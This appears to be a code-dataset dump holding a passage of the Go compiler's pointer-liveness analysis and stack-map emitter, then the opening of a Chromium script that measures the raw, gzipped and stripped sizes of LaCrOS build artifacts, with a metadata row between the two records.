// Special cases.
switch v.Op {
case ssa.OpLoadReg:
n, _ := AutoVar(v.Args[0])
return n, ssa.SymRead
case ssa.OpStoreReg:
n, _ := AutoVar(v)
return n, ssa.SymWrite
case ssa.OpVarLive:
return v.Aux.(*Node), ssa.SymRead
case ssa.OpVarDef, ssa.OpVarKill:
return v.Aux.(*Node), ssa.SymWrite
case ssa.OpKeepAlive:
n, _ := AutoVar(v.Args[0])
return n, ssa.SymRead
}
e := v.Op.SymEffect()
if e == 0 {
return nil, 0
}
switch a := v.Aux.(type) {
case nil, *obj.LSym:
// ok, but no node
return nil, e
case *Node:
return a, e
default:
Fatalf("weird aux: %s", v.LongString())
return nil, e
}
}
// Constructs a new liveness structure used to hold the global state of the
// liveness computation. The cfg argument is a slice of *BasicBlocks and the
// vars argument is a slice of *Nodes.
func newliveness(fn *Node, f *ssa.Func, vars []*Node, idx map[*Node]int32, stkptrsize int64) *Liveness {
lv := &Liveness{
fn: fn,
f: f,
vars: vars,
idx: idx,
stkptrsize: stkptrsize,
be: make([]BlockEffects, f.NumBlocks()),
}
nblocks := int32(len(f.Blocks))
nvars := int32(len(vars))
bulk := bvbulkalloc(nvars, nblocks*7)
for _, b := range f.Blocks {
be := lv.blockEffects(b)
be.uevar = bulk.next()
be.varkill = bulk.next()
be.livein = bulk.next()
be.liveout = bulk.next()
be.avarinit = bulk.next()
be.avarinitany = bulk.next()
be.avarinitall = bulk.next()
}
return lv
}
func (lv *Liveness) blockEffects(b *ssa.Block) *BlockEffects {
return &lv.be[b.ID]
}
// NOTE: The bitmap for a specific type t could be cached in t after
// the first run and then simply copied into bv at the correct offset
// on future calls with the same type t.
func onebitwalktype1(t *types.Type, off int64, bv bvec) {
if t.Align > 0 && off&int64(t.Align-1) != 0 {
Fatalf("onebitwalktype1: invalid initial alignment, %v", t)
}
switch t.Etype {
case TINT8, TUINT8, TINT16, TUINT16,
TINT32, TUINT32, TINT64, TUINT64,
TINT, TUINT, TUINTPTR, TBOOL,
TFLOAT32, TFLOAT64, TCOMPLEX64, TCOMPLEX128:
case TPTR32, TPTR64, TUNSAFEPTR, TFUNC, TCHAN, TMAP:
if off&int64(Widthptr-1) != 0 {
Fatalf("onebitwalktype1: invalid alignment, %v", t)
}
bv.Set(int32(off / int64(Widthptr))) // pointer
case TSTRING:
// struct { byte *str; intgo len; }
if off&int64(Widthptr-1) != 0 {
Fatalf("onebitwalktype1: invalid alignment, %v", t)
}
bv.Set(int32(off / int64(Widthptr))) //pointer in first slot
case TINTER:
// struct { Itab *tab; void *data; }
// or, when isnilinter(t)==true:
// struct { Type *type; void *data; }
if off&int64(Widthptr-1) != 0 {
Fatalf("onebitwalktype1: invalid alignment, %v", t)
}
// The first word of an interface is a pointer, but we don't
// treat it as such.
// 1. If it is a non-empty interface, the pointer points to an itab
// which is always in persistentalloc space.
// 2. If it is an empty interface, the pointer points to a _type.
// a. If it is a compile-time-allocated type, it points into
// the read-only data section.
// b. If it is a reflect-allocated type, it points into the Go heap.
// Reflect is responsible for keeping a reference to
// the underlying type so it won't be GCd.
// If we ever have a moving GC, we need to change this for 2b (as
// well as scan itabs to update their itab._type fields).
bv.Set(int32(off/int64(Widthptr) + 1)) // pointer in second slot
case TSLICE:
// struct { byte *array; uintgo len; uintgo cap; }
if off&int64(Widthptr-1) != 0 {
Fatalf("onebitwalktype1: invalid TARRAY alignment, %v", t)
}
bv.Set(int32(off / int64(Widthptr))) // pointer in first slot (BitsPointer)
case TARRAY:
elt := t.Elem()
if elt.Width == 0 {
// Short-circuit for #20739.
break
}
for i := int64(0); i < t.NumElem(); i++ {
onebitwalktype1(elt, off, bv)
off += elt.Width
}
case TSTRUCT:
for _, f := range t.Fields().Slice() {
onebitwalktype1(f.Type, off+f.Offset, bv)
}
default:
Fatalf("onebitwalktype1: unexpected type, %v", t)
}
}
// localWords returns the number of words of local variables.
func (lv *Liveness) localWords() int32 {
return int32(lv.stkptrsize / int64(Widthptr))
}
// argWords returns the number of words of in and out arguments.
func (lv *Liveness) argWords() int32 {
return int32(lv.fn.Type.ArgWidth() / int64(Widthptr))
}
// Generates live pointer value maps for arguments and local variables. The
// this argument and the in arguments are always assumed live. The vars
// argument is a slice of *Nodes.
func (lv *Liveness) pointerMap(liveout bvec, vars []*Node, args, locals bvec) {
for i := int32(0); ; i++ {
i = liveout.Next(i)
if i < 0 {
break
}
node := vars[i]
switch node.Class() {
case PAUTO:
onebitwalktype1(node.Type, node.Xoffset+lv.stkptrsize, locals)
case PPARAM, PPARAMOUT:
onebitwalktype1(node.Type, node.Xoffset, args)
}
}
}
// Returns true for instructions that are safe points that must be annotated
// with liveness information.
func issafepoint(v *ssa.Value) bool {
return v.Op.IsCall()
}
// Initializes the sets for solving the live variables. Visits all the
// instructions in each basic block to summarizes the information at each basic
// block
func (lv *Liveness) prologue() {
lv.initcache()
for _, b := range lv.f.Blocks {
be := lv.blockEffects(b)
// Walk the block instructions backward and update the block
// effects with the each prog effects.
for j := len(b.Values) - 1; j >= 0; j-- {
pos, e := lv.valueEffects(b.Values[j])
if e&varkill != 0 {
be.varkill.Set(pos)
be.uevar.Unset(pos)
}
if e&uevar != 0 {
be.uevar.Set(pos)
}
}
// Walk the block instructions forward to update avarinit bits.
// avarinit describes the effect at the end of the block, not the beginning.
for _, val := range b.Values {
pos, e := lv.valueEffects(val)
if e&varkill != 0 {
be.avarinit.Unset(pos)
}
if e&avarinit != 0 {
be.avarinit.Set(pos)
}
}
}
}
// Solve the liveness dataflow equations.
func (lv *Liveness) solve() {
// These temporary bitvectors exist to avoid successive allocations and
// frees within the loop.
newlivein := bvalloc(int32(len(lv.vars)))
newliveout := bvalloc(int32(len(lv.vars)))
any := bvalloc(int32(len(lv.vars)))
all := bvalloc(int32(len(lv.vars)))
// Push avarinitall, avarinitany forward.
// avarinitall says the addressed var is initialized along all paths reaching the block exit.
// avarinitany says the addressed var is initialized along some path reaching the block exit.
for _, b := range lv.f.Blocks {
be := lv.blockEffects(b)
if b == lv.f.Entry {
be.avarinitall.Copy(be.avarinit)
} else {
be.avarinitall.Clear()
be.avarinitall.Not()
}
be.avarinitany.Copy(be.avarinit)
}
// Walk blocks in the general direction of propagation (RPO
// for avarinit{any,all}, and PO for live{in,out}). This
// improves convergence.
po := lv.f.Postorder()
for change := true; change; {
change = false
for i := len(po) - 1; i >= 0; i-- {
b := po[i]
be := lv.blockEffects(b)
lv.avarinitanyall(b, any, all)
any.AndNot(any, be.varkill)
all.AndNot(all, be.varkill)
any.Or(any, be.avarinit)
all.Or(all, be.avarinit)
if !any.Eq(be.avarinitany) {
change = true
be.avarinitany.Copy(any)
}
if !all.Eq(be.avarinitall) {
change = true
be.avarinitall.Copy(all)
}
}
}
// Iterate through the blocks in reverse round-robin fashion. A work
// queue might be slightly faster. As is, the number of iterations is
// so low that it hardly seems to be worth the complexity.
for change := true; change; {
change = false
for _, b := range po {
be := lv.blockEffects(b)
newliveout.Clear()
switch b.Kind {
case ssa.BlockRet:
for _, pos := range lv.cache.retuevar {
newliveout.Set(pos)
}
case ssa.BlockRetJmp:
for _, pos := range lv.cache.tailuevar {
newliveout.Set(pos)
}
case ssa.BlockExit:
// nothing to do
default:
// A variable is live on output from this block
// if it is live on input to some successor.
//
// out[b] = \bigcup_{s \in succ[b]} in[s]
newliveout.Copy(lv.blockEffects(b.Succs[0].Block()).livein)
for _, succ := range b.Succs[1:] {
newliveout.Or(newliveout, lv.blockEffects(succ.Block()).livein)
}
}
if !be.liveout.Eq(newliveout) {
change = true
be.liveout.Copy(newliveout)
}
// A variable is live on input to this block
// if it is live on output from this block and
// not set by the code in this block.
//
// in[b] = uevar[b] \cup (out[b] \setminus varkill[b])
newlivein.AndNot(be.liveout, be.varkill)
be.livein.Or(newlivein, be.uevar)
}
}
}
// Visits all instructions in a basic block and computes a bit vector of live
// variables at each safe point locations.
func (lv *Liveness) epilogue() {
nvars := int32(len(lv.vars))
liveout := bvalloc(nvars)
any := bvalloc(nvars)
all := bvalloc(nvars)
livedefer := bvalloc(nvars) // always-live variables
// If there is a defer (that could recover), then all output
// parameters are live all the time. In addition, any locals
// that are pointers to heap-allocated output parameters are
// also always live (post-deferreturn code needs these
// pointers to copy values back to the stack).
// TODO: if the output parameter is heap-allocated, then we
// don't need to keep the stack copy live?
if lv.fn.Func.HasDefer() {
for i, n := range lv.vars {
if n.Class() == PPARAMOUT {
if n.IsOutputParamHeapAddr() {
// Just to be paranoid. Heap addresses are PAUTOs.
Fatalf("variable %v both output param and heap output param", n)
}
if n.Name.Param.Heapaddr != nil {
// If this variable moved to the heap, then
// its stack copy is not live.
continue
}
// Note: zeroing is handled by zeroResults in walk.go.
livedefer.Set(int32(i))
}
if n.IsOutputParamHeapAddr() {
n.Name.SetNeedzero(true)
livedefer.Set(int32(i))
}
}
}
{
// Reserve an entry for function entry.
live := bvalloc(nvars)
for _, pos := range lv.cache.textavarinit {
live.Set(pos)
}
lv.livevars = append(lv.livevars, live)
}
for _, b := range lv.f.Blocks {
be := lv.blockEffects(b)
// Compute avarinitany and avarinitall for entry to block.
// This duplicates information known during livenesssolve
// but avoids storing two more vectors for each block.
lv.avarinitanyall(b, any, all)
// Walk forward through the basic block instructions and
// allocate liveness maps for those instructions that need them.
// Seed the maps with information about the addrtaken variables.
for _, v := range b.Values {
pos, e := lv.valueEffects(v)
if e&varkill != 0 {
any.Unset(pos)
all.Unset(pos)
}
if e&avarinit != 0 {
any.Set(pos)
all.Set(pos)
}
if !issafepoint(v) {
continue
}
// Annotate ambiguously live variables so that they can
// be zeroed at function entry and at VARKILL points.
// liveout is dead here and used as a temporary.
liveout.AndNot(any, all)
if !liveout.IsEmpty() {
for pos := int32(0); pos < liveout.n; pos++ {
if !liveout.Get(pos) {
continue
}
all.Set(pos) // silence future warnings in this block
n := lv.vars[pos]
if !n.Name.Needzero() {
n.Name.SetNeedzero(true)
if debuglive >= 1 {
Warnl(v.Pos, "%v: %L is ambiguously live", lv.fn.Func.Nname, n)
}
}
}
}
// Live stuff first.
live := bvalloc(nvars)
live.Copy(any)
lv.livevars = append(lv.livevars, live)
}
be.lastbitmapindex = len(lv.livevars) - 1
}
for _, b := range lv.f.Blocks {
be := lv.blockEffects(b)
// walk backward, construct maps at each safe point
index := int32(be.lastbitmapindex)
if index < 0 {
// the first block we encounter should have the ATEXT so
// at no point should pos ever be less than zero.
Fatalf("livenessepilogue")
}
liveout.Copy(be.liveout)
for i := len(b.Values) - 1; i >= 0; i-- {
v := b.Values[i]
if issafepoint(v) {
// Found an interesting instruction, record the
// corresponding liveness information.
live := lv.livevars[index]
live.Or(live, liveout)
live.Or(live, livedefer) // only for non-entry safe points
index--
}
// Update liveness information.
pos, e := lv.valueEffects(v)
if e&varkill != 0 {
liveout.Unset(pos)
}
if e&uevar != 0 {
liveout.Set(pos)
}
}
if b == lv.f.Entry {
if index != 0 {
Fatalf("bad index for entry point: %v", index)
}
// Record live variables.
live := lv.livevars[index]
live.Or(live, liveout)
}
}
// Useful sanity check: on entry to the function,
// the only things that can possibly be live are the
// input parameters.
for j, n := range lv.vars {
if n.Class() != PPARAM && lv.livevars[0].Get(int32(j)) {
Fatalf("internal error: %v %L recorded as live on entry", lv.fn.Func.Nname, n)
}
}
}
func (lv *Liveness) clobber() {
// The clobberdead experiment inserts code to clobber all the dead variables (locals and args)
// before and after every safepoint. This experiment is useful for debugging the generation
// of live pointer bitmaps.
if objabi.Clobberdead_enabled == 0 {
return
}
var varSize int64
for _, n := range lv.vars {
varSize += n.Type.Size()
}
if len(lv.livevars) > 1000 || varSize > 10000 {
// Be careful to avoid doing too much work.
// Bail if >1000 safepoints or >10000 bytes of variables.
// Otherwise, giant functions make this experiment generate too much code.
return
}
if h := os.Getenv("GOCLOBBERDEADHASH"); h != "" {
// Clobber only functions where the hash of the function name matches a pattern.
// Useful for binary searching for a miscompiled function.
hstr := ""
for _, b := range sha1.Sum([]byte(lv.fn.funcname())) {
hstr += fmt.Sprintf("%08b", b)
}
if !strings.HasSuffix(hstr, h) {
return
}
fmt.Printf("\t\t\tCLOBBERDEAD %s\n", lv.fn.funcname())
}
if lv.f.Name == "forkAndExecInChild" {
// forkAndExecInChild calls vfork (on linux/amd64, anyway).
// The code we add here clobbers parts of the stack in the child.
// When the parent resumes, it is using the same stack frame. But the
// child has clobbered stack variables that the parent needs. Boom!
// In particular, the sys argument gets clobbered.
// Note to self: GOCLOBBERDEADHASH=011100101110
return
}
var oldSched []*ssa.Value
for _, b := range lv.f.Blocks {
// Copy block's values to a temporary.
oldSched = append(oldSched[:0], b.Values...)
b.Values = b.Values[:0]
// Clobber all dead variables at entry.
if b == lv.f.Entry {
for len(oldSched) > 0 && len(oldSched[0].Args) == 0 {
// Skip argless ops. We need to skip at least
// the lowered ClosurePtr op, because it
// really wants to be first. This will also
// skip ops like InitMem and SP, which are ok.
b.Values = append(b.Values, oldSched[0])
oldSched = oldSched[1:]
}
clobber(lv, b, lv.livevars[0])
}
// Copy values into schedule, adding clobbering around safepoints.
for _, v := range oldSched {
if !issafepoint(v) {
b.Values = append(b.Values, v)
continue
}
before := true
if v.Op.IsCall() && v.Aux != nil && v.Aux.(*obj.LSym) == typedmemmove {
// Can't put clobber code before the call to typedmemmove.
// The variable to-be-copied is marked as dead
// at the callsite. That is ok, though, as typedmemmove
// is marked as nosplit, and the first thing it does
// is to call memmove (also nosplit), after which
// the source value is dead.
// See issue 16026.
before = false
}
if before {
clobber(lv, b, lv.livevars[lv.stackMapIndex[v]])
}
b.Values = append(b.Values, v)
clobber(lv, b, lv.livevars[lv.stackMapIndex[v]])
}
}
}
// clobber generates code to clobber all dead variables (those not marked in live).
// Clobbering instructions are added to the end of b.Values.
func clobber(lv *Liveness, b *ssa.Block, live bvec) {
for i, n := range lv.vars {
if !live.Get(int32(i)) {
clobberVar(b, n)
}
}
}
// clobberVar generates code to trash the pointers in v.
// Clobbering instructions are added to the end of b.Values.
func clobberVar(b *ssa.Block, v *Node) {
clobberWalk(b, v, 0, v.Type)
}
// b = block to which we append instructions
// v = variable
// offset = offset of (sub-portion of) variable to clobber (in bytes)
// t = type of sub-portion of v.
func clobberWalk(b *ssa.Block, v *Node, offset int64, t *types.Type) {
if !types.Haspointers(t) {
return
}
switch t.Etype {
case TPTR32,
TPTR64,
TUNSAFEPTR,
TFUNC,
TCHAN,
TMAP:
clobberPtr(b, v, offset)
case TSTRING:
// struct { byte *str; int len; }
clobberPtr(b, v, offset)
case TINTER:
// struct { Itab *tab; void *data; }
// or, when isnilinter(t)==true:
// struct { Type *type; void *data; }
// Note: the first word isn't a pointer. See comment in plive.go:onebitwalktype1.
clobberPtr(b, v, offset+int64(Widthptr))
case TSLICE:
// struct { byte *array; int len; int cap; }
clobberPtr(b, v, offset)
case TARRAY:
for i := int64(0); i < t.NumElem(); i++ {
clobberWalk(b, v, offset+i*t.Elem().Size(), t.Elem())
}
case TSTRUCT:
for _, t1 := range t.Fields().Slice() {
clobberWalk(b, v, offset+t1.Offset, t1.Type)
}
default:
Fatalf("clobberWalk: unexpected type, %v", t)
}
}
// clobberPtr generates a clobber of the pointer at offset offset in v.
// The clobber instruction is added at the end of b.
func clobberPtr(b *ssa.Block, v *Node, offset int64) {
b.NewValue0IA(src.NoXPos, ssa.OpClobber, types.TypeVoid, offset, v)
}
func (lv *Liveness) avarinitanyall(b *ssa.Block, any, all bvec) {
if len(b.Preds) == 0 {
any.Clear()
all.Clear()
for _, pos := range lv.cache.textavarinit {
any.Set(pos)
all.Set(pos)
}
return
}
be := lv.blockEffects(b.Preds[0].Block())
any.Copy(be.avarinitany)
all.Copy(be.avarinitall)
for _, pred := range b.Preds[1:] {
be := lv.blockEffects(pred.Block())
any.Or(any, be.avarinitany)
all.And(all, be.avarinitall)
}
}
// FNV-1 hash function constants.
const (
H0 = 2166136261
Hp = 16777619
)
func hashbitmap(h uint32, bv bvec) uint32 {
n := int((bv.n + 31) / 32)
for i := 0; i < n; i++ {
w := bv.b[i]
h = (h * Hp) ^ (w & 0xff)
h = (h * Hp) ^ ((w >> 8) & 0xff)
h = (h * Hp) ^ ((w >> 16) & 0xff)
h = (h * Hp) ^ ((w >> 24) & 0xff)
}
return h
}
// Compact liveness information by coalescing identical per-call-site bitmaps.
// The merging only happens for a single function, not across the entire binary.
//
// There are actually two lists of bitmaps, one list for the local variables and one
// list for the function arguments. Both lists are indexed by the same PCDATA
// index, so the corresponding pairs must be considered together when
// merging duplicates. The argument bitmaps change much less often during
// function execution than the local variable bitmaps, so it is possible that
// we could introduce a separate PCDATA index for arguments vs locals and
// then compact the set of argument bitmaps separately from the set of
// local variable bitmaps. As of 2014-04-02, doing this to the godoc binary
// is actually a net loss: we save about 50k of argument bitmaps but the new
// PCDATA tables cost about 100k. So for now we keep using a single index for
// both bitmap lists.
func (lv *Liveness) compact() {
// Linear probing hash table of bitmaps seen so far.
// The hash table has 4n entries to keep the linear
// scan short. An entry of -1 indicates an empty slot.
n := len(lv.livevars)
tablesize := 4 * n
table := make([]int, tablesize)
for i := range table {
table[i] = -1
}
// remap[i] = the new index of the old bit vector #i.
remap := make([]int, n)
for i := range remap {
remap[i] = -1
}
uniq := 0 // unique tables found so far
// Consider bit vectors in turn.
// If new, assign next number using uniq,
// record in remap, record in lv.livevars
// under the new index, and add entry to hash table.
// If already seen, record earlier index in remap.
Outer:
for i, live := range lv.livevars {
h := hashbitmap(H0, live) % uint32(tablesize)
for {
j := table[h]
if j < 0 {
break
}
jlive := lv.livevars[j]
if live.Eq(jlive) {
remap[i] = j
continue Outer
}
h++
if h == uint32(tablesize) {
h = 0
}
}
table[h] = uniq
remap[i] = uniq
lv.livevars[uniq] = live
uniq++
}
// We've already reordered lv.livevars[0:uniq]. Clear the
// pointers later in the array so they can be GC'd.
tail := lv.livevars[uniq:]
for i := range tail { // memclr loop pattern
tail[i] = bvec{}
}
lv.livevars = lv.livevars[:uniq]
// Record compacted stack map indexes for each value.
// These will later become PCDATA instructions.
lv.showlive(nil, lv.livevars[0])
pos := 1
lv.stackMapIndex = make(map[*ssa.Value]int)
for _, b := range lv.f.Blocks {
for _, v := range b.Values {
if issafepoint(v) {
lv.showlive(v, lv.livevars[remap[pos]])
lv.stackMapIndex[v] = remap[pos]
pos++
}
}
}
}
func (lv *Liveness) showlive(v *ssa.Value, live bvec) {
if debuglive == 0 || lv.fn.funcname() == "init" || strings.HasPrefix(lv.fn.funcname(), ".") {
return
}
if live.IsEmpty() {
return
}
pos := lv.fn.Func.Nname.Pos
if v != nil {
pos = v.Pos
}
s := "live at "
if v == nil {
s += fmt.Sprintf("entry to %s:", lv.fn.funcname())
} else if sym, ok := v.Aux.(*obj.LSym); ok {
fn := sym.Name
if pos := strings.Index(fn, "."); pos >= 0 {
fn = fn[pos+1:]
}
s += fmt.Sprintf("call to %s:", fn)
} else {
s += "indirect call:"
}
for j, n := range lv.vars {
if live.Get(int32(j)) {
s += fmt.Sprintf(" %v", n)
}
}
Warnl(pos, s)
}
func (lv *Liveness) printbvec(printed bool, name string, live bvec) bool {
started := false
for i, n := range lv.vars {
if !live.Get(int32(i)) {
continue
}
if !started {
if !printed {
fmt.Printf("\t")
} else {
fmt.Printf(" ")
}
started = true
printed = true
fmt.Printf("%s=", name)
} else {
fmt.Printf(",")
}
fmt.Printf("%s", n.Sym.Name)
}
return printed
}
// printeffect is like printbvec, but for a single variable.
func (lv *Liveness) printeffect(printed bool, name string, pos int32, x bool) bool {
if !x {
return printed
}
if !printed {
fmt.Printf("\t")
} else {
fmt.Printf(" ")
}
fmt.Printf("%s=%s", name, lv.vars[pos].Sym.Name)
return true
}
// Prints the computed liveness information and inputs, for debugging.
// This format synthesizes the information used during the multiple passes
// into a single presentation.
func (lv *Liveness) printDebug() {
fmt.Printf("liveness: %s\n", lv.fn.funcname())
pcdata := 0
for i, b := range lv.f.Blocks {
if i > 0 {
fmt.Printf("\n")
}
// bb#0 pred=1,2 succ=3,4
fmt.Printf("bb#%d pred=", b.ID)
for j, pred := range b.Preds {
if j > 0 {
fmt.Printf(",")
}
fmt.Printf("%d", pred.Block().ID)
}
fmt.Printf(" succ=")
for j, succ := range b.Succs {
if j > 0 {
fmt.Printf(",")
}
fmt.Printf("%d", succ.Block().ID)
}
fmt.Printf("\n")
be := lv.blockEffects(b)
// initial settings
printed := false
printed = lv.printbvec(printed, "uevar", be.uevar)
printed = lv.printbvec(printed, "livein", be.livein)
if printed {
fmt.Printf("\n")
}
// program listing, with individual effects listed
if b == lv.f.Entry {
live := lv.livevars[pcdata]
fmt.Printf("(%s) function entry\n", linestr(lv.fn.Func.Nname.Pos))
fmt.Printf("\tlive=")
printed = false
for j, n := range lv.vars {
if !live.Get(int32(j)) {
continue
}
if printed {
fmt.Printf(",")
}
fmt.Printf("%v", n)
printed = true
}
fmt.Printf("\n")
}
for _, v := range b.Values {
fmt.Printf("(%s) %v\n", linestr(v.Pos), v.LongString())
if pos, ok := lv.stackMapIndex[v]; ok {
pcdata = pos
}
pos, effect := lv.valueEffects(v)
printed = false
printed = lv.printeffect(printed, "uevar", pos, effect&uevar != 0)
printed = lv.printeffect(printed, "varkill", pos, effect&varkill != 0)
printed = lv.printeffect(printed, "avarinit", pos, effect&avarinit != 0)
if printed {
fmt.Printf("\n")
}
if !issafepoint(v) {
continue
}
live := lv.livevars[pcdata]
fmt.Printf("\tlive=")
printed = false
for j, n := range lv.vars {
if !live.Get(int32(j)) {
continue
}
if printed {
fmt.Printf(",")
}
fmt.Printf("%v", n)
printed = true
}
fmt.Printf("\n")
}
// bb bitsets
fmt.Printf("end\n")
printed = false
printed = lv.printbvec(printed, "varkill", be.varkill)
printed = lv.printbvec(printed, "liveout", be.liveout)
printed = lv.printbvec(printed, "avarinit", be.avarinit)
printed = lv.printbvec(printed, "avarinitany", be.avarinitany)
printed = lv.printbvec(printed, "avarinitall", be.avarinitall)
if printed {
fmt.Printf("\n")
}
}
fmt.Printf("\n")
}
// Dumps a slice of bitmaps to a symbol as a sequence of uint32 values. The
// first word dumped is the total number of bitmaps. The second word is the
// length of the bitmaps. All bitmaps are assumed to be of equal length. The
// remaining bytes are the raw bitmaps.
func (lv *Liveness) emit(argssym, livesym *obj.LSym) {
args := bvalloc(lv.argWords())
aoff := duint32(argssym, 0, uint32(len(lv.livevars))) // number of bitmaps
aoff = duint32(argssym, aoff, uint32(args.n)) // number of bits in each bitmap
locals := bvalloc(lv.localWords())
loff := duint32(livesym, 0, uint32(len(lv.livevars))) // number of bitmaps
loff = duint32(livesym, loff, uint32(locals.n)) // number of bits in each bitmap
for _, live := range lv.livevars {
args.Clear()
locals.Clear()
lv.pointerMap(live, lv.vars, args, locals)
aoff = dbvec(argssym, aoff, args)
loff = dbvec(livesym, loff, locals)
}
// Give these LSyms content-addressable names,
// so that they can be de-duplicated.
// This provides significant binary size savings.
// It is safe to rename these LSyms because
// they are tracked separately from ctxt.hash.
argssym.Name = fmt.Sprintf("gclocals·%x", md5.Sum(argssym.P))
livesym.Name = fmt.Sprintf("gclocals·%x", md5.Sum(livesym.P))
}
// Entry pointer for liveness analysis. Solves for the liveness of
// pointer variables in the function and emits a runtime data
// structure read by the garbage collector.
// Returns a map from GC safe points to their corresponding stack map index.
func liveness(e *ssafn, f *ssa.Func) map[*ssa.Value]int {
// Construct the global liveness state.
vars, idx := getvariables(e.curfn)
lv := newliveness(e.curfn, f, vars, idx, e.stkptrsize)
// Run the dataflow framework.
lv.prologue()
lv.solve()
lv.epilogue()
lv.compact()
lv.clobber()
if debuglive >= 2 {
lv.printDebug()
}
// Emit the live pointer map data structures
if ls := e.curfn.Func.lsym; ls != nil {
lv.emit(&ls.Func.GCArgs, &ls.Func.GCLocals)
}
return lv.stackMapIndex
}
| [
"\"GOCLOBBERDEADHASH\""
]
| []
| [
"GOCLOBBERDEADHASH"
]
| [] | ["GOCLOBBERDEADHASH"] | go | 1 | 0 | |
build/lacros/lacros_resource_sizes.py | #!/usr/bin/env python
# Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Reports binary size metrics for LaCrOS build artifacts.
More information at //docs/speed/binary_size/metrics.md.
"""
import argparse
import collections
import contextlib
import json
import logging
import os
import subprocess
import sys
import tempfile
@contextlib.contextmanager
def _SysPath(path):
"""Library import context that temporarily appends |path| to |sys.path|."""
if path and path not in sys.path:
sys.path.insert(0, path)
else:
path = None # Indicates that |sys.path| is not modified.
try:
yield
finally:
if path:
sys.path.pop(0)
DIR_SOURCE_ROOT = os.environ.get(
'CHECKOUT_SOURCE_ROOT',
os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)))
BUILD_COMMON_PATH = os.path.join(DIR_SOURCE_ROOT, 'build', 'util', 'lib',
'common')
TRACING_PATH = os.path.join(DIR_SOURCE_ROOT, 'third_party', 'catapult',
'tracing')
EU_STRIP_PATH = os.path.join(DIR_SOURCE_ROOT, 'buildtools', 'third_party',
'eu-strip', 'bin', 'eu-strip')
with _SysPath(BUILD_COMMON_PATH):
import perf_tests_results_helper # pylint: disable=import-error
with _SysPath(TRACING_PATH):
from tracing.value import convert_chart_json # pylint: disable=import-error
_BASE_CHART = {
'format_version': '0.1',
'benchmark_name': 'resource_sizes',
'benchmark_description': 'LaCrOS resource size information.',
'trace_rerun_options': [],
'charts': {}
}
_KEY_RAW = 'raw'
_KEY_GZIPPED = 'gzipped'
_KEY_STRIPPED = 'stripped'
_KEY_STRIPPED_GZIPPED = 'stripped_then_gzipped'
class _Group:
"""A group of build artifacts whose file sizes are summed and tracked.
Build artifacts for size tracking fall under these categories:
* File: A single file.
* Group: A collection of files.
* Dir: All files under a directory.
Attributes:
paths: A list of files or directories to be tracked together.
title: The display name of the group.
track_stripped: Whether to also track summed stripped ELF sizes.
track_compressed: Whether to also track summed compressed sizes.
"""
def __init__(self, paths, title, track_stripped=False,
track_compressed=False):
self.paths = paths
self.title = title
self.track_stripped = track_stripped
self.track_compressed = track_compressed
# List of disjoint build artifact groups for size tracking. This list should be
# synched with lacros-amd64-generic-binary-size-rel builder contents (specified
# in # //infra/config/subprojects/chromium/ci.star) and
# chromeos-amd64-generic-lacros-internal builder (specified in src-internal).
_TRACKED_GROUPS = [
_Group(paths=['chrome'],
title='File: chrome',
track_stripped=True,
track_compressed=True),
_Group(paths=['chrome_crashpad_handler'],
title='File: chrome_crashpad_handler'),
_Group(paths=['icudtl.dat'], title='File: icudtl.dat'),
_Group(paths=['nacl_helper'], title='File: nacl_helper'),
_Group(paths=['nacl_irt_x86_64.nexe'], title='File: nacl_irt_x86_64.nexe'),
_Group(paths=['resources.pak'], title='File: resources.pak'),
_Group(paths=[
'chrome_100_percent.pak', 'chrome_200_percent.pak', 'headless_lib.pak'
],
title='Group: Other PAKs'),
_Group(paths=['snapshot_blob.bin'], title='Group: Misc'),
_Group(paths=['locales/'], title='Dir: locales'),
_Group(paths=['swiftshader/'], title='Dir: swiftshader'),
_Group(paths=['WidevineCdm/'], title='Dir: WidevineCdm'),
]
def _visit_paths(base_dir, paths):
"""Itemizes files specified by a list of paths.
Args:
base_dir: Base directory for all elements in |paths|.
paths: A list of filenames or directory names to specify files whose sizes
to be counted. Directories are recursed. There's no de-duping effort.
Non-existing files or directories are ignored (with warning message).
"""
for path in paths:
full_path = os.path.join(base_dir, path)
if os.path.exists(full_path):
if os.path.isdir(full_path):
for dirpath, _, filenames in os.walk(full_path):
for filename in filenames:
yield os.path.join(dirpath, filename)
else: # Assume is file.
yield full_path
else:
logging.critical('Not found: %s', path)
def _is_probably_elf(filename):
"""Heuristically decides whether |filename| is ELF via magic signature."""
with open(filename, 'rb') as fh:
return fh.read(4) == '\x7FELF'
def _is_unstrippable_elf(filename):
"""Identifies known-unstrippable ELF files to denoise the system."""
return filename.endswith('.nexe') or filename.endswith('libwidevinecdm.so')
def _get_filesize(filename):
"""Returns the size of a file, or 0 if file is not found."""
try:
return os.path.getsize(filename)
except OSError:
logging.critical('Failed to get size: %s', filename)
return 0
def _get_gzipped_filesize(filename):
"""Returns the gzipped size of a file, or 0 if file is not found."""
BUFFER_SIZE = 65536
if not os.path.isfile(filename):
return 0
try:
# Call gzip externally instead of using gzip package since it's > 2x faster.
cmd = ['gzip', '-c', filename]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
# Manually counting bytes instead of using len(p.communicate()[0]) to avoid
# buffering the entire compressed data (can be ~100 MB).
ret = 0
while True:
chunk = len(p.stdout.read(BUFFER_SIZE))
if chunk == 0:
break
ret += chunk
return ret
except OSError:
logging.critical('Failed to get gzipped size: %s', filename)
return 0
def _get_catagorized_filesizes(filename):
"""Measures |filename| sizes under various transforms.
Returns: A Counter (keyed by _Key_* constants) that stores measured sizes.
"""
sizes = collections.Counter()
sizes[_KEY_RAW] = _get_filesize(filename)
sizes[_KEY_GZIPPED] = _get_gzipped_filesize(filename)
# Pre-assign values for non-ELF, or in case of failure for ELF.
sizes[_KEY_STRIPPED] = sizes[_KEY_RAW]
sizes[_KEY_STRIPPED_GZIPPED] = sizes[_KEY_GZIPPED]
if _is_probably_elf(filename) and not _is_unstrippable_elf(filename):
try:
fd, temp_file = tempfile.mkstemp()
os.close(fd)
cmd = [EU_STRIP_PATH, filename, '-o', temp_file]
subprocess.check_output(cmd)
sizes[_KEY_STRIPPED] = _get_filesize(temp_file)
sizes[_KEY_STRIPPED_GZIPPED] = _get_gzipped_filesize(temp_file)
if sizes[_KEY_STRIPPED] > sizes[_KEY_RAW]:
# This weird case has been observed for libwidevinecdm.so.
logging.critical('Stripping made things worse for %s' % filename)
except subprocess.CalledProcessError:
logging.critical('Failed to strip file: %s' % filename)
finally:
os.unlink(temp_file)
return sizes
